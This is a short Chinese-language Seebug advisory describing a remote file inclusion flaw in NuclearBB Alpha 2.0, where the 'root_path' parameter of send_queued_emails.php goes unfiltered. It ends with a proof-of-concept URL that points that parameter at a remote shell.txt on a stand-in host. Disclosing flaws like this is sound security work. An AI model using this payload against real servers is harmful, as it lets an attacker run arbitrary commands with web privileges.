Lucene search

K
seebugRootSSV:2221
HistorySep 14, 2007 - 12:00 a.m.

NuclearBB send_queued_emails.php远程文件包含漏洞

2007-09-1400:00:00
Root
www.seebug.org
44

NuclearBB是一款基于PHP的WEB应用程序。
NuclearBB不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞以WEB权限执行任意命令。
问题是由于’send_queued_emails.php’脚本对用户提交的’root_path’参数缺少过滤,指定远程服务器上的任意文件作为包含对象,可导致以以WEB权限执行任意命令。

NuclearBB Alpha 2.0
目前没有解决方案提供:
<a href=“http://www.nuclearbb.com/” target=“_blank”>http://www.nuclearbb.com/</a>


                                                http://www.example.com/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.example2.com/shell.txt?